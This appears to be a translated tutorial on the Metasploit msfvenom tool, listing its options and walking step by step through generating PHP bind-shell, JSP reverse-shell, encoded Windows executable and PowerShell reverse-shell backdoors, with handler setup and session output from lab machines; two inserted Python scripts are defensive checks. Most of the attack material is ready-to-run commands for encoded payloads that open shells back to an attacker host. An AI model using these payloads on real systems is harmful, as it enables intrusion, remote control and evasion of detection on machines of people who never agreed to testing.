The msfvenom command-line options are as follows:
Options:
-p, --payload <payload>       Specify the payload to use. For a custom payload, pass '-' or use stdin
-l, --list [module_type]      List all available modules of the given type. Module types: payloads, encoders, nops, all
-n, --nopsled <length>        Prepend a NOP sled of the given length to the payload
-f, --format <format>         Specify the output format (use --help-formats to list the formats msf supports)
-e, --encoder [encoder]       Specify the encoder to use
-a, --arch <architecture>     Specify the target architecture of the payload
    --platform <platform>     Specify the target platform of the payload
-s, --space <length>          Set the maximum size of the resulting payload
-b, --bad-chars <list>        Set the list of characters to avoid, e.g. '\x00\xff'
-i, --iterations <count>      Number of times to encode the payload
-c, --add-code <path>         Specify an additional win32 shellcode file to include
-x, --template <path>         Specify a custom executable file to use as a template
-k, --keep                    Preserve the template program's behaviour; the injected payload runs as a new process
    --payload-options         List the payload's standard options
-o, --out <path>              Save the payload to a file (">" redirection can be used instead)
-v, --var-name <name>         Specify a custom variable name used in the output format
    --smallest                Generate the smallest possible payload
-h, --help                    Show help
    --help-formats            List the output formats msf supports
root@kali:/usr/share/metasploit-framework/modules/payloads/singles# msfvenom --help-formats
Executable formats
    asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
Transform formats
    bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
The format given to -f can also be abbreviated to a single capital letter:
For example, X stands for -f exe
[H]arp [P]erl Rub[Y] [R]aw [J]s e[X]e [D]ll [V]BA [W]ar Pytho[N]
First look at the payloads. There are currently 437 payloads in total, roughly grouped by target platform (windows/linux/osx/android) and by programming language (python/php, etc.).
root@kali:~# msfvenom -l payloads
List the supported encoders
root@kali:~# msfvenom -l encoders
If you use the -b option (a list of characters to avoid), an encoder is invoked automatically.
Otherwise you need the -e option to select an encoder module, for example:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
You can also use the -i option to run the encoder several times.
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe
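Whether -b was honoured is easy to confirm after the fact. As an added example (not from the original post), the check below parses a -b list in the same '\x00\xff' syntax, rebuilds the bytes from output in the shape of -f c, and reports every offset that still carries an avoided byte. The sample output is constructed from arbitrary bytes, not a real payload.

```python
import re
from typing import List, Set, Tuple

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_bad_chars(spec: str) -> Set[int]:
    """Turn an msfvenom -b value such as '\\x00\\xff' into a set of byte values.

    The string is taken exactly as typed on the shell, i.e. with literal
    backslashes; anything that is not a run of \\xNN escapes is rejected.
    """
    hexes = HEX_ESCAPE.findall(spec)
    if len(hexes) * 4 != len(spec):
        raise ValueError("bad-chars list must be a sequence of \\xNN escapes")
    return {int(h, 16) for h in hexes}


def c_format_to_bytes(text: str) -> bytes:
    """Rebuild the raw bytes from `msfvenom -f c` output (quoted \\xNN literals)."""
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(text))


def find_bad_chars(blob: bytes, bad: Set[int]) -> List[Tuple[int, int]]:
    """Return (offset, value) for every byte of blob that is in the avoid set."""
    return [(i, b) for i, b in enumerate(blob) if b in bad]


def check_c_output(text: str, spec: str) -> List[Tuple[int, int]]:
    """Convenience wrapper: -f c text plus the -b spec -> list of violations."""
    return find_bad_chars(c_format_to_bytes(text), parse_bad_chars(spec))


# Constructed sample in the shape of `msfvenom ... -f c` output; the bytes are
# arbitrary filler chosen to contain one \x00 and one \xff, not shellcode.
SAMPLE_C_OUTPUT = r"""unsigned char buf[] =
"\x41\x42\x00\x43"
"\xff\x44\x45";
"""

if __name__ == "__main__":
    for offset, value in check_c_output(SAMPLE_C_OUTPUT, r"\x00\xff"):
        print(f"avoided byte 0x{value:02x} still present at offset {offset}")
```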
Some usage demonstrations follow:
Kali: 172.16.100.182
Test machine: 172.16.100.155
Generating a PHP backdoor with msfvenom
List the PHP-related payloads
msfvenom -l payloads | grep php
Here we test with bind_php
php/bind_php Listen for a connection and spawn a command shell via php
Show the configuration options
root@kali:~# msfvenom -p php/bind_php --payload-options
Generate the backdoor
msfvenom -p php/bind_php RHOST=172.16.100.155 R
Strip the leading /*
Browse to http://172.16.100.155/1.php, then check the listener
[root@vincenthostname html]# netstat -antlp | grep httpd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      1494/httpd
msf > use multi/handler
msf exploit(handler) > set payload php/bind_php
payload => php/bind_php
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/bind_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > set rhost 172.16.100.155
rhost => 172.16.100.155
msf exploit(handler) > exploit
[*] Exploit running as background job.
[*] Started bind handler
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:43351 -> 172.16.100.155:4444) at 2017-09-14 15:57:11 +0800
Upgrading to Meterpreter
msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.100.182:4433
[*] Sending stage (826840 bytes) to 172.16.100.155
[*] Meterpreter session 2 opened (172.16.100.182:4433 -> 172.16.100.155:43087) at 2017-09-14 15:58:49 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption
[*] Command stager progress: 100.00% (736/736 bytes)
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                         Connection
  --  ----                   -----------                                         ----------
  1   shell php/php                                                              172.16.100.182:43351 -> 172.16.100.155:4444 (172.16.100.155)
  2   meterpreter x86/linux  uid=48, gid=48, euid=48, egid=48 @ 172.16.100.155  172.16.100.182:4433 -> 172.16.100.155:43087 (172.16.100.155)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer     : 172.16.100.155
OS           : CentOS 6.5 (Linux 2.6.39)
Architecture : x64
Meterpreter  : x86/linux
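From the defender's side, the netstat output above is the telltale: the web server process owns a listening socket on a port it has no business serving. As an added example (not from the original post), the check below parses netstat -antlp output and flags LISTEN sockets held by a web server process on ports outside its expected set. The sample lines are constructed; the 1494/httpd line on 4444 mirrors the one shown above, and the port and program-name sets are assumptions to adapt per host.

```python
from typing import List, Tuple

# Constructed sample in the shape of `netstat -antlp` output. The 4444/httpd
# line reproduces the listener that php/bind_php opened in the walkthrough.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1012/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      1494/httpd
tcp        0      0 172.16.100.155:80       172.16.100.182:50122    ESTABLISHED 1494/httpd
tcp        0      0 :::80                   :::*                    LISTEN      1494/httpd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           812/dhclient
"""

# Assumed baseline: ports a web server process should listen on, and the
# program names that count as a web server. Tune both for the host in question.
EXPECTED_WEB_PORTS = {80, 443}
WEB_SERVER_NAMES = {"httpd", "apache2", "nginx", "php-fpm"}

Listener = Tuple[str, int, int, str]  # (local address, port, pid, program)


def parse_listeners(text: str) -> List[Listener]:
    """Return every LISTEN socket in netstat -antlp output as (addr, port, pid, prog)."""
    listeners: List[Listener] = []
    for line in text.splitlines():
        fields = line.split()
        # TCP rows have 7 columns; UDP rows lack a State column and are skipped.
        if len(fields) < 7 or fields[5] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # rpartition copes with :::80
        pid, _, prog = fields[6].partition("/")
        if not (port.isdigit() and pid.isdigit()):
            continue
        listeners.append((addr, int(port), int(pid), prog))
    return listeners


def unexpected_web_listeners(text: str) -> List[Listener]:
    """Flag listening sockets owned by a web server process on non-web ports."""
    return [lst for lst in parse_listeners(text)
            if lst[3] in WEB_SERVER_NAMES and lst[1] not in EXPECTED_WEB_PORTS]


if __name__ == "__main__":
    for addr, port, pid, prog in unexpected_web_listeners(SAMPLE_NETSTAT):
        print(f"suspicious: {prog} (pid {pid}) listening on {addr}:{port}")
```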
Generating a Java backdoor with msfvenom
List the payloads available
msfvenom -l payloads | grep java
Here we use
java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell
root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.100.182 > /tmp/shell.jsp
Payload size: 1500 bytes
Visit the page to receive the reverse shell
msf > use multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.100.182:4444
msf exploit(handler) > [*] Command shell session 1 opened (172.16.100.182:4444 -> 172.16.100.1:5509) at 2017-09-14 16:11:10 +0800

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

E:\tomcat\bin>whoami
whoami
dell-pc\dell
Generating a Windows backdoor with msfvenom
root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=172.16.100.128 LPORT=2345 -f exe -o abc.exe
Listen locally:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.100.128
LHOST => 172.16.100.128
msf exploit(handler) > set LPORT 2345
LPORT => 2345
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.100.128:2345
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.128:2345 -> 172.16.100.1:56101) at 2016-03-20 16:08:55 +0800

meterpreter > sysinfo
Computer        : DELL-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
Generating a PowerShell backdoor for Windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.100.182 LPORT=6666 -f psh-reflection > test.ps1
msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 172.16.100.182:6666
Then, on the Windows side, run powershell -file "test.ps1"
msf exploit(handler) > [*] Sending stage (194623 bytes) to 172.16.100.1
[*] Meterpreter session 6 opened (172.16.100.182:6666 -> 172.16.100.1:62470) at 2017-09-23 17:33:08 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: dell-PC\dell
References
http://www.freebuf.com/sectool/72135.html
http://www.huo119.com/post/909.shtm